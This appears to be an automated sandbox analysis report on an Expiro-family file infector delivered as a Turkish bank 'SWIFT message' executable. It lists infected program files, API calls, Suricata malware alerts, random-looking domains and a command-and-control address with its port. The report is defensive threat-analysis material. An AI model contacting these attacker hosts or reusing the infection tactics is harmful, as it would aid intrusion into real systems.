Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:54634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49724 -> 72.52.178.23:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49755 -> 13.213.51.196:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:55274 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 204.10.161.147
Source: Malware configuration extractor	URLs: 204.10.161.147:7082

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 49

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49723 -> 204.10.161.147:7082

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 13.248.148.254 13.248.148.254

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.4:49752
